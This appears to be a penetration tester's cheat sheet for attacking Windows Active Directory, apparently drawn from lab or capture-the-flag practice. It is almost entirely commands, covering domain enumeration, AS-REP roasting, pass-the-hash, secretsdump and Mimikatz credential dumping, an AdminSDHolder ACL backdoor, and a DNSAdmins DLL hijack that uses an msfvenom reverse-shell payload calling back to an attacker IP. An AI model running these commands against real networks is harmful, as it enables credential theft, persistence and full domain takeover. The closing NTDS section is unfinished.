Table of Contents

• Enumeration
  • Overall Information
    • Enum4linux
    • PowerView Module
  • Domain Objects
  • DNS Info
  • System Relationship
    • BloodHound-python
    • SharpHound.ps1
  • GPP Policy
• Foothold
  • Asrep Roasting
• Lateral Movement
  • Pass the Password
  • Pass the Hash
  • Dump NTLM Hashes
  • Dump SAM/LSA
  • Token Impersonation
  • DLL Hijacking
  • Dump NTDS

Enumeration

Overall Information

Enum4linux

You have nothing, just want a overview of the system

enum4linux -a <ip>

PowerView Module

powershell -ep bypass

# import module
. .\PowerView.ps1

Get-NetDomain

Get-DomainController

Get-DomainPolicy|(Get-DomainPolicy)."system access"

Get-DomainPolicy

(Get-DomainPolicy)."system access"

Get-NetUser [| select [cn|samaccountname|description]]

Get-UseProperty [-Properties passwordlastset|logonaccount|badpwdcount]

Get-NetComputer [-FullData]

Get-NetGroup [-GroupName "Domain Admins"]

Get-NetGroupMember -GroupName "Domain Admins"

Get-NetGPO [| select displayname [, whenchanged]]

# Other tricks thanks to harmj0y, this serve as a checklist
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group>

# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred

# retrieve all the computer dns host names a GPP password applies to
Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}

# get all users with passwords changed > 1 year ago, returning sam account names and password last set times
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset

# all enabled users, returning distinguishednames
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname

# all disabled users
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter ACCOUNTDISABLE

# all users that require smart card authentication
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED

# all users that *don't* require smart card authentication, only returning sam account names
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname

# use multiple identity types for any *-Domain* function
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff

# find all users with an SPN set (likely service accounts)
Get-DomainUser -SPN

# check for users who don't have kerberos preauthentication set
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH

# find all service accounts in "Domain Admins"
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}

# find users with sidHistory set
Get-DomainUser -LDAPFilter '(sidHistory=*)'

# find any users/computers with constrained delegation st
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount

# return the local *groups* of a remote server
Get-NetLocalGroup SERVER.domain.local

# return the local group *members* of a remote server using Win32 API methods (faster but less info)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local

# Kerberoast any users in a particular OU with SPNs set
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"

# Find-DomainUserLocation == old Invoke-UserHunter
# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
Find-DomainUserLocation -ComputerUnconstrained -ShowAll

# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

# find all computers in a given OU
Get-DomainComputer -SearchBase "ldap://OU=..."

# Get the logged on users for all machines in any *server* OU in a particular domain
Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}}

# enumerate all gobal catalogs in the forest
Get-ForestGlobalCatalog

# turn a list of computer short names to FQDNs, using a global catalog
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}

# enumerate the current domain controller policy
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights # user privilege rights on the dc...

# enumerate the current domain policy
$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess # password age/etc.

# enumerate what machines that a particular user/group identity has local admin rights to
#   Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>

# enumerate what machines that a given user in the specified domain has RDP access rights to
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP

# export a csv of all GPO mappings
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv

# use alternate credentials for searching for files on the domain
#   Find-InterestingDomainShareFile == old Invoke-FileFinder
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential

# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

# grant user 'will' the rights to change 'matt's password
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose

# audit the permissions of AdminSDHolder, resolving GUIDs
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs

# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}

# find linked DA accounts using name correlation
Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname}

# save a PowerView object to disk for later usage
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml

# Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}

# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}

# find all policies applied to a current machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local

# enumerate all groups in a domain that don't have a global scope, returning just group names
Get-DomainGroup -GroupScope NotGlobal -Properties name

# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
#   query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
$Domains = @{}
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
    # extract the domain the foreign user was added to
    $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
    # check if we've already enumerated this domain
    if (-not $Domains[$ForeignUserDomain]) {
        $Domains[$ForeignUserDomain] = $True
        # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
        $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
        Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
    }
}
$ForeignMemberships | fl

# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf

# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier

# set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose

# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y

# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
    ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
}

# check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl

Domain Objects

LDAP Service present, no credentials needed, lsist objects in AD

ldapsearch -h <dc-ip> -p 389 -x -b "dc=<domain-comp|TEST>,dc=<domain-comp|com>"

Got a shell on the target, powershell is working, list objects in AD

Get-ADObject -Filter ['whenChanged -gt $changeDate] -and isDeleted -eq $true -and -not (isRecycled -eq $true) -and name -ne "Deleted Objects"' -IncludeDeletedObjects

DNS Info

DNS Server present

dig srv _kerberos.tcp.<ip>

System Relationship

BloodHound-python

Got valid credential

# Pull json data from server
bloodhound-python -d <domain> -u <username> -p <password> -gc <global-catalogue> -c all -ns <nameserver>

# Then analyze with bloodhound

neo4j - neo4j start console

bloodhound

SharpHound.ps1

Got a shell on the target machine, use SharpHound to pull json data

powershell -ep bypass

# import module
. .\SharpHound.ps1

Invoke-Bloodhound -CollectionMethod All -Domain <domain> -ZipFileName <output.zip>

GPP Policy

Got any user credential or target smb service allow anonymous login

# smb_enum_gpp module in metasploit
use auxiliary/scanner/smb/smb_enum_gpp

# crack the listed cpassword
gpp-decrypt <encrypted-password>

Foothold

Asrep Roasting

In bloodhound, an account has GetChangesAll privilege and is marked Asrep Roastable

# Get TGT hash
GetNPUsers.py <domain>/<user> -request -no-pass -dc-ip <ip>

# Crack hash with John
john hash.txt --fork=4 --format=krb5asrep --wordlist=<wordlist>

Lateral Movement

Pass the Password

You've got a user's password

crackmapexec <ip/range> -u <username> -d <domain> -p password

# or you can do it with psexec
psexec.py <domain>/<username>:<password>@<dc-ip>

Pass the Hash

You've got the NTLM hash

crackmapexec <ip/range> -u <username> -H <hash> --local

# or with pexec
psexec.py <domain>/<username>:<password>@<dc-ip> -hashes <LM-Hash>:<NT-Hash>

Dump NTLM Hashes

You've got a privileged user's password, dump all system user hashes

secretsdump.py <doman>/<username>:<password>@<dc-ip>

Dump SAM/LSA

You've got a user's password, try dump the SAM/LSA

crackmapexec <ip/range> -u <username> -d <domain> -p password --[sam|lsa]

Token Impersonation

You'e got a meterpreter shell on the target machine

# load icognito module
load icognito

# list user tokens
list_tokens -u

# impersonate the token
impersonate_token <domain>\\<username>

# if the token belongs to admin account, you can dump LSA with mimikatz
powershell -ep bypass

Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit' -Computer <gc>

DLL Hijacking

PowerUp script shows Write-HijackDll - use msfvenom to generate payload, and put it into corresponding directory, the pre-requisite is that you have the permission to restart the computer or the service

If some user is DNSAdmins, then dns dll hijacking can be used to escalate privilege

# generate maliciou dll
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=9905 -a x64 --platform windows -f dll -o dnsfun.dll

# host the dll on local machine
smbserver.py <share-name> <share-path>

# inject the dll remotely
dnscmd.exe resolute.megabank.local /config /serverlevelplugindll \\<host-ip>\<share-name>\ <dll-name>

# restart the service
sc.exe \\<gc> stop|start dns

Dump NTDS

You've got admin credentials. And you want to dump all the hashes in NTDS file. SMBExec utilizes shadow copy function to copy the file. (Needs revision...)

Select 3 for Obtain Hashes

Select 2 for Domain Controllers

Provide username/hash/domain/IP/NTDS Drive/NTDS Path